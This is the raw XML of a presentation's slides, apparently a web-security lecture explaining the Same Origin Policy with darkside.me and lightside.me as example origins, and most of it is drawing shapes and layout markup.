              <a:chOff x="3729526" y="1005434"/>
              <a:chExt cx="1361520" cy="318240"/>
            </a:xfrm>
          </p:grpSpPr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DC0DDB13-2164-4309-91E6-C916BF820F60}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3729526" y="1005434"/>
                <a:ext cx="1055520" cy="318240"/>
                <a:chOff x="3729526" y="1005434"/>
                <a:chExt cx="1055520" cy="318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142" name="Freihand 141">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4FBF8F9-91FB-47FD-9709-94D3DBF28C0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9526" y="1005434"/>
                    <a:ext cx="229320" cy="318240"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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3720526" y="996434"/>
                      <a:ext cx="246960" cy="33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143" name="Freihand 142">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B57181B1-C2D8-472F-A3DC-F1294EE55B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5966" y="1163834"/>
                    <a:ext cx="100440" cy="15840"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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3767326" y="1154834"/>
                      <a:ext cx="118080" cy="33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144" name="Freihand 143">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCB7FB07-EC94-4DBC-BB26-9D61A9543D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326" y="1006874"/>
                    <a:ext cx="21600" cy="299160"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4010686" y="997874"/>
                      <a:ext cx="39240" cy="31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145" name="Freihand 144">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69CF9672-72F6-45EB-8D1B-98ADB156E0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73966" y="1096154"/>
                    <a:ext cx="119160" cy="12960"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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3964966" y="1087514"/>
                      <a:ext cx="13680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146" name="Freihand 145">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D20CB1DC-73A9-40BF-89CC-3EAC71FD6A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79526" y="1013354"/>
                    <a:ext cx="37440" cy="297000"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4170526" y="1004354"/>
                      <a:ext cx="55080" cy="31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147" name="Freihand 146">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05371051-4F8F-491A-8F2C-228683CEA5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94206" y="1089674"/>
                    <a:ext cx="177480" cy="33120"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4085206" y="1080674"/>
                      <a:ext cx="195120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148" name="Freihand 147">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8E7AA9-63E9-488B-BABE-7AADD526D9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94726" y="1167794"/>
                    <a:ext cx="118080" cy="118080"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4286086" y="1158794"/>
                      <a:ext cx="135720" cy="13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149" name="Freihand 148">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0A14AB3-2887-4274-9B7E-560AD769A6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23966" y="1165634"/>
                    <a:ext cx="57240" cy="108360"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4414966" y="1156994"/>
                      <a:ext cx="7488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1">
                  <p14:nvContentPartPr>
                    <p14:cNvPr id="150" name="Freihand 149">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA648E5E-F1F1-45EF-BCC4-3529213441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35926" y="1176794"/>
                    <a:ext cx="124920" cy="109080"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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:cNvPr>
                    <p:cNvPicPr/>
                    <p:nvPr/>
                  </p:nvPicPr>
                  <p:blipFill>
                    <a:blip r:embed="rId152"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </p:blipFill>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="4526926" y="1168154"/>
                      <a:ext cx="142560" cy="12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3">
                  <p14:nvContentPartPr>
                    <p14:cNvPr id="151" name="Freihand 150">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F530C4E2-4931-443C-97D5-2E969B434F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2006" y="1061234"/>
                    <a:ext cx="24120" cy="229320"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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:cNvPr>
                    <p:cNvPicPr/>
                    <p:nvPr/>
                  </p:nvPicPr>
                  <p:blipFill>
                    <a:blip r:embed="rId154"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </p:blipFill>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="4663366" y="1052594"/>
                      <a:ext cx="41760" cy="246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5">
                  <p14:nvContentPartPr>
                    <p14:cNvPr id="152" name="Freihand 151">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE191947-E96D-4FBE-913C-D0D6595A94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06926" y="1144034"/>
                    <a:ext cx="78120" cy="140040"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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:cNvPr>
                    <p:cNvPicPr/>
                    <p:nvPr/>
                  </p:nvPicPr>
                  <p:blipFill>
                    <a:blip r:embed="rId156"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </p:blipFill>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="4697926" y="1135394"/>
                      <a:ext cx="95760" cy="157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64B65819-4362-43EF-8C1F-F5E75195ED7F}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4830766" y="1146554"/>
                  <a:ext cx="120960" cy="11592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4822126" y="1137554"/>
                    <a:ext cx="13860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C4F1C706-7969-471D-9185-FB59FB6C5613}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4994566" y="1115954"/>
                  <a:ext cx="96480" cy="1630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4985926" y="1106954"/>
                    <a:ext cx="114120" cy="180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769564B0-DE12-4DA7-9F4B-7256EC0512F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="688966" y="840914"/>
              <a:ext cx="1555200" cy="87840"/>
              <a:chOff x="688966" y="840914"/>
              <a:chExt cx="1555200" cy="8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F59A5F4-5B4F-437A-86D6-62E4C85ACCCD}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="688966" y="914354"/>
                  <a:ext cx="91440" cy="144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679966" y="905354"/>
                    <a:ext cx="10908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AE5BA407-7B87-4D40-9209-DEA719F1F963}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="889846" y="886274"/>
                  <a:ext cx="97200" cy="1368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81206" y="877634"/>
                    <a:ext cx="11484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4B98CAE-B07C-4E08-8526-1CA4267929C4}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1107286" y="886994"/>
                  <a:ext cx="109080" cy="1296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098286" y="878354"/>
                    <a:ext cx="1267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067B4CDF-62DF-4A1E-BE85-92A782EFCE31}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1324366" y="876914"/>
                  <a:ext cx="93600" cy="1044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315726" y="867914"/>
                    <a:ext cx="11124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74B06897-33BF-4A85-B1E6-AB7E67FC19E9}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1533886" y="882314"/>
                  <a:ext cx="93600" cy="90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1524886" y="873674"/>
                    <a:ext cx="11124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48E9DCD5-D242-4FCE-9A1E-70943CBA03E9}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1716046" y="878714"/>
                  <a:ext cx="116640" cy="576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1707406" y="870074"/>
                    <a:ext cx="13428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5692F827-0F63-42F1-98BF-5F59BB89F555}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1964446" y="857114"/>
                  <a:ext cx="87840" cy="864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1955806" y="848474"/>
                    <a:ext cx="10548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40998FD-8017-4845-AC14-231FB501AE17}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2154526" y="840914"/>
                  <a:ext cx="89640" cy="15480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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2145886" y="831914"/>
                    <a:ext cx="107280" cy="33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8BFF6F89-5F06-4786-AEA2-FBECF95BD868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="1572765">
            <a:off x="7980745" y="4187412"/>
            <a:ext cx="1090080" cy="390600"/>
            <a:chOff x="3426766" y="948194"/>
            <a:chExt cx="1090080" cy="390600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="174" name="Gruppieren 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{114CC851-B51A-45F0-8448-2E4A09B4AD03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77" name="Freihand 176">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E13F73DD-196F-450C-8522-252587911F8D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72733AEE-71AE-4AB8-8462-133C41B4C9D7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BDD29910-03B2-46F0-BCB6-2C969EBBBE1F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91825486-8254-4847-A6B1-2AD8697DCE9C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B2300307-AD12-48BB-B121-F64C6BEE7EA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7AAAC532-86A6-41A3-BB9F-77EFD49845B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BEDCD773-89AF-4CAB-93F8-D0770F85D008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0FF86429-4B67-4862-9BC8-E66C4911A838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F8E2B94E-DD7D-476E-A186-6C7956A8DDA3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7138F76C-08C0-4B8B-BA1D-8A3550B511E9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EA872315-F8A2-41CA-AAC9-0158B5827E15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29F6D0A5-E0E0-4220-8FA9-4F9DB3C9DFB7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uppieren 186">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03781296-477A-46D3-B51C-3D86B7A717C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9685158" y="3812445"/>
            <a:ext cx="2266560" cy="1233360"/>
            <a:chOff x="8755481" y="4747220"/>
            <a:chExt cx="2266560" cy="1233360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="188" name="Gruppieren 187">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96E5C424-BB12-485C-9306-081FA5BB1067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8A064815-6ADE-41D0-893E-9D74C11F380F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9BE5BA5D-DF56-4E40-B859-2D1E07EABEA4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3" name="Freihand 212">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA568039-3029-49C7-8738-5CDDC2EAE220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F1895D73-5A59-444A-95BB-BCB264A32015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DA08A67E-B4F3-4D48-BDE6-56D1843268F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9" name="Gruppieren 188">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064907C2-054E-46FB-9E01-BCC0230BCC34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B137110-02B2-449F-B6C3-29CC31D293C1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EF0E07EA-BEEC-4993-8E4E-7B994B8324EF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08" name="Freihand 207">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6674622-93AF-44AB-BEA5-0B428AED0446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8460A046-51EB-4C2D-AD48-2962E15E469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254E6B59-A37E-491A-BB2A-2A6AABFFC35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0" name="Freihand 189">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3F363A6-E381-4177-AED9-CFB999305F2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1" name="Freihand 190">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D6065FE-C880-4002-81DF-87BCC86DC2DE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2" name="Freihand 191">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBDD25B1-0EDE-47BC-A7A9-3545BC1273B3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3" name="Gruppieren 192">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{253E3813-F8DD-4055-B728-2BD057C881D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04" name="Freihand 203">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DEADC16-301D-4545-9F49-098B6198BC0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05" name="Freihand 204">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A679A15-B933-492B-84C8-A9DD2D3B270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4" name="Gruppieren 193">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BB2C49-081F-451E-846D-5EFF2E93B287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02" name="Freihand 201">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{326C7393-2278-4D32-BF63-8DDF6E7BF79D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03" name="Freihand 202">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6410851-1B86-49CF-B8A8-331B85DE8B8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483E9C8B-1582-4D0D-A13B-601C1855E343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6" name="Freihand 195">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E3EE9B1-ADF4-44A1-9613-9F5CBCAC39CF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7" name="Gruppieren 196">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B94440FC-370F-4A44-A0B2-62B7F67B652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98" name="Freihand 197">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B7AF1D0-2B70-4DEB-A86A-252304E3989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99" name="Freihand 198">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98D27A76-22BA-4EF1-94CE-4B7D9E11650D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00" name="Freihand 199">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F393A1F-CC90-4883-8905-C918C113063A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01" name="Freihand 200">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9927834D-78D0-4BC5-8DD2-89B08A975643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8427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365C7-BB21-4D3C-98BB-099DF91D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Same Origin Policy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rescue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>!</a:t>
            </a:r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09DABF-17EA-483C-9842-E3ECAE17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2141866"/>
            <a:ext cx="7829550" cy="7143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AE695E7-E151-4FD1-9853-27794BBB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802" y="3953750"/>
            <a:ext cx="6715125" cy="22479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AC7B1B5-C687-4002-980E-E7CA70177826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2498835" y="3307419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/coiframe.html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darkside.me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D6BD763-C797-4126-B46C-F9CDEFC0E07E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3295087" y="3630584"/>
            <a:ext cx="1529162" cy="283780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1529162"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 283780"/>
              <a:gd name="connsiteX1" fmla="*/ 494429 w 1529162"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 283780"/>
              <a:gd name="connsiteX2" fmla="*/ 958275 w 1529162"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 283780"/>
              <a:gd name="connsiteX3" fmla="*/ 1529162 w 1529162"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 283780"/>
              <a:gd name="connsiteX4" fmla="*/ 1529162 w 1529162"/>
              <a:gd name="connsiteY4" fmla="*/ 283780 h 283780"/>
              <a:gd name="connsiteX5" fmla="*/ 1050025 w 1529162"/>
              <a:gd name="connsiteY5" fmla="*/ 283780 h 283780"/>
              <a:gd name="connsiteX6" fmla="*/ 509721 w 1529162"/>
              <a:gd name="connsiteY6" fmla="*/ 283780 h 283780"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1529162"/>
              <a:gd name="connsiteY7" fmla="*/ 283780 h 283780"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1529162"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 28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9162" h="283780" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="246424" y="7327"/>
                  <a:pt x="316199" y="-2355"/>
                  <a:pt x="494429" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="672659" y="2355"/>
                  <a:pt x="751185" y="282"/>
                  <a:pt x="958275" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1165365" y="-282"/>
                  <a:pt x="1345046" y="-18935"/>
                  <a:pt x="1529162" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1523666" y="108252"/>
                  <a:pt x="1518429" y="206250"/>
                  <a:pt x="1529162" y="283780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1421348" y="304319"/>
                  <a:pt x="1186011" y="293579"/>
                  <a:pt x="1050025" y="283780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="914039" y="273981"/>
                  <a:pt x="689610" y="276054"/>
                  <a:pt x="509721" y="283780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="329832" y="291506"/>
                  <a:pt x="135533" y="266179"/>
                  <a:pt x="0" y="283780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-852" y="164261"/>
                  <a:pt x="2538" y="103395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FB6322F-559B-40B4-83FA-9612BCABF0E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5481238" y="4876050"/>
            <a:ext cx="2422541" cy="252999"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2422541"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 252999"/>
              <a:gd name="connsiteX1" fmla="*/ 581410 w 2422541"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 252999"/>
              <a:gd name="connsiteX2" fmla="*/ 1114369 w 2422541"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 252999"/>
              <a:gd name="connsiteX3" fmla="*/ 1768455 w 2422541"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 252999"/>
              <a:gd name="connsiteX4" fmla="*/ 2422541 w 2422541"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 252999"/>
              <a:gd name="connsiteX5" fmla="*/ 2422541 w 2422541"/>
              <a:gd name="connsiteY5" fmla="*/ 252999 h 252999"/>
              <a:gd name="connsiteX6" fmla="*/ 1865357 w 2422541"/>
              <a:gd name="connsiteY6" fmla="*/ 252999 h 252999"/>
              <a:gd name="connsiteX7" fmla="*/ 1308172 w 2422541"/>
              <a:gd name="connsiteY7" fmla="*/ 252999 h 252999"/>
              <a:gd name="connsiteX8" fmla="*/ 654086 w 2422541"/>
              <a:gd name="connsiteY8" fmla="*/ 252999 h 252999"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 2422541"/>
              <a:gd name="connsiteY9" fmla="*/ 252999 h 252999"/>
              <a:gd name="connsiteX10" fmla="*/ 0 w 2422541"/>
              <a:gd name="connsiteY10" fmla="*/ 0 h 25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2541" h="252999" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="210055" y="23782"/>
                  <a:pt x="330845" y="-25093"/>
                  <a:pt x="581410" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="831975" y="25093"/>
                  <a:pt x="899547" y="26158"/>
                  <a:pt x="1114369" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1329191" y="-26158"/>
                  <a:pt x="1587772" y="25151"/>
                  <a:pt x="1768455" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1949138" y="-25151"/>
                  <a:pt x="2183230" y="-4493"/>
                  <a:pt x="2422541" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2433323" y="108301"/>
                  <a:pt x="2415917" y="133653"/>
                  <a:pt x="2422541" y="252999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2250469" y="238702"/>
                  <a:pt x="2104641" y="257718"/>
                  <a:pt x="1865357" y="252999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1626073" y="248280"/>
                  <a:pt x="1584433" y="251575"/>
                  <a:pt x="1308172" y="252999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1031911" y="254423"/>
                  <a:pt x="834342" y="257387"/>
                  <a:pt x="654086" y="252999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="473830" y="248611"/>
                  <a:pt x="218476" y="237674"/>
                  <a:pt x="0" y="252999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3584" y="143037"/>
                  <a:pt x="11832" y="8817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032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9942E4-E5EC-409B-81F6-0AA8029AE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9510" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Remember</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> SOP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chapter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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898A89D-645B-47DD-8760-039A787F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5892"/>
          </a:xfrm>
        </p:spPr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web‘s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r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>idea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Code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(darkside.me)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interfere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(lightside.me)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Origin = Protocol + Host + Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>http://darkside.me:80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>http://lightside.me:80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8208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993016"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="60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7637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4065654"/>
            <a:ext cx="4253553" cy="2592591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9A69FD5-C9BA-478D-99A3-681992EBA07A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C9BAA366-AF6D-4946-94B4-B2A80239E879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C5CAD1F-F130-4C57-81A1-54E2BF95B30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20603052-767B-4A8E-9378-C34AED14647D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2B18454C-65D3-4F9F-B69F-01004FD597A5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7E24BAE-5D20-4098-BCEA-9443374307E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
